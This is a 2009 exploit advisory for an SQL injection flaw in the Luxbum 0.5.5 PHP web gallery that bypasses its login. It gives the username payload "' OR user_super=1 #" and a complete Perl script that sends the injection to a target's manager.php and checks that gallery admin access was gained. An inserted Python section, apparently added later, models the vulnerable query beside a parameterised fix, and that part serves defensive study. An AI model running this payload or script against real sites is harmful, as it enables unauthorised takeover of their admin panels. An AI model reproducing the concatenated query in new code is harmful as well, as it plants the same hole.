Luxbum 0.5.5/stable (Auth Bypass) SQL Injection Vulnerability
Source: knxone[at]webmail(d0t)ru  Author: knxone  Published: 2009-05-09

 __                                              
/\ \                                             
\ \ \/'\     ___    __  _   ___     ___      __  
 \ \ , <   /' _ `\ /\ \/'\ / __`\ /' _ `\  /'__`\
  \ \ \\`\ /\ \/\ \\/>  <//\ \L\ \/\ \/\ \/\  __/
   \ \_\ \_\ \_\ \_\/\_/\_\ \____/\ \_\ \_\ \____\
    \/_/\/_/\/_/\/_/\//\/_/\/___/  \/_/\/_/\/____/
        Better to be alone than in bad company


+============+
| MAIN INFOS |
+============+

Software name: luxbum (PHP Web gallery)
Version: 0.5.5/stable
Flaw type: sql injection -> auth bypass
URL:  http://www.luxbum.net/
Found by: knxone <knxone[at]webmail(d0t)ru>
Greetings: _Pirata_ from this famous irc server ;)


+=========+
| CONCEPT |
+=========+

Luxbum can authenticate users against a dotclear username and password stored in
MySQL, whereas its default auth mechanism compares against an md5 hash of the
password stored in a PHP file.

If you trace all the code from login form to admin panel, you'll notice that
user input isn't filtered in manager.php or mysql.inc.php.

So when dotclear auth is enabled in luxbum, SQL injection is possible; for the
bypass to work, though, the injected query has to return at least one row, and
that row has to be a dotclear admin.

In dotclear, the table dc_user stores the super-admin status in the column
"user_super": if it equals 1, the user is a super-admin. Since the luxbum auth
mechanism already has full access to dotclear's user data, exploitation is
very easy and does not require disclosing any dotclear database details (DB
name, username, password, table prefix etc.).


+=========+
| EXPLOIT |
+=========+

- requires magic_quotes = Off
- requires use of dotclear auth (not default)

Go to:             http://host/luxbum/manager.php
Enter as Username: ' OR user_super=1 #
Enter as Password: xxxxxxxxxxxxxxxxxxxx
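The advisory does not show luxbum's actual query, so the following is an added Python/SQLite model (not the project's code) of the two sides of this bug: a login that concatenates the username into SQL, as the CONCEPT section describes, beside the parameterised version that makes the same payload harmless. The table and column user_super are from the advisory; user_id and user_pwd are assumed names, and the MySQL '#' comment in the payload is written as '--' because the demo runs on SQLite.

```python
import hashlib
import hmac
import sqlite3


def pw_hash(password):
    # The advisory says the gallery compares an md5 of the password; mirrored
    # here only for fidelity, a new design would use a slow, salted hash.
    return hashlib.md5(password.encode()).hexdigest()


def make_db():
    # Constructed in-memory stand-in for dotclear's dc_user table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE dc_user (user_id TEXT, user_pwd TEXT, user_super INTEGER)")
    db.executemany("INSERT INTO dc_user VALUES (?, ?, ?)", [
        ("admin", pw_hash("correct horse"), 1),  # dotclear super-admin
        ("alice", pw_hash("alice-pass"), 0),     # ordinary dotclear user
    ])
    return db


def login_vulnerable(db, username, password):
    """Login built by string concatenation: the unfiltered-input pattern the
    advisory reports in manager.php / mysql.inc.php (hypothetical model)."""
    sql = ("SELECT user_id, user_super FROM dc_user WHERE user_id = '%s' "
           "AND user_pwd = '%s'" % (username, pw_hash(password)))
    row = db.execute(sql).fetchone()
    return row[0] if row and row[1] == 1 else None


def login_fixed(db, username, password):
    """Same check with a bound parameter: the username is only ever data, so
    the quote and OR in the payload cannot change the query's structure."""
    row = db.execute(
        "SELECT user_id, user_pwd, user_super FROM dc_user WHERE user_id = ?",
        (username,),
    ).fetchone()
    if row is None or row[2] != 1:
        return None
    # Constant-time comparison so a wrong hash is rejected without timing leaks.
    return row[0] if hmac.compare_digest(row[1], pw_hash(password)) else None


# The advisory's username payload, with SQLite's '--' in place of MySQL's '#'.
PAYLOAD = "' OR user_super=1 -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "x" * 32))  # admin
    print("fixed:     ", login_fixed(db, PAYLOAD, "x" * 32))       # None
```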


+==============+
| EXPLOIT CODE |
+==============+

#!/usr/bin/perl -w
# luxbum 0.5.5 auth bypass via sql injection.
# requires magic_quotes Off and use of dotclear auth
# returns 0 if successful, else 1
# ./luxbum http://host.tld/luxbumrootdir
# By knxone <knxone[at]webmail(d0t)ru>
use strict;
use LWP::UserAgent;
use HTTP::Cookies;
use Term::ANSIColor qw(:constants);
$Term::ANSIColor::AUTORESET = 1;
help() if ( ! defined($ARGV[0]) || scalar(@ARGV) != 1 );


my $ua = LWP::UserAgent->new(
 agent      => 'Mozilla/4.73 [en] (U; Windows 3.1; Internet Explorer 2.0)',
 cookie_jar => HTTP::Cookies->new(
  file           => ".cookies",
  autosave       => 1      
 )
);
my $url = $ARGV[0]."/manager.php?p=login";

# First we inject to open a valid session
my $req = HTTP::Request->new( POST => $url ) ;
$req->content_type("application/x-www-form-urlencoded");
$req->content("username='+OR+user_super%3D1%23&password=".'x'x32);
my $response = $ua->request($req);
if ( ! $response->is_error && $response->content !~ m/message_ko/ ) {
 print BOLD GREEN "Auth bypass successful :-)\n";
} else {
 print BOLD RED "Auth bypass failed :-(\n";
 exit(1);
}


# Then we check if we've really done it
$response = $ua->get($ARGV[0]."/manager.php");
if ( $response->content =~ m/h1_admin/ ) {
 print BOLD GREEN "Access Granted as gallery Admin at ".$ARGV[0]." :-)))\n";
 exit(0);
} else {
 print BOLD RED "Access Denied at ".$ARGV[0]." :-(\n";
 exit(1);
}


sub help {
 print "Usage: ".$0." http://host.tld/luxbumrootdir\n";
 exit(1);
}

#EOF

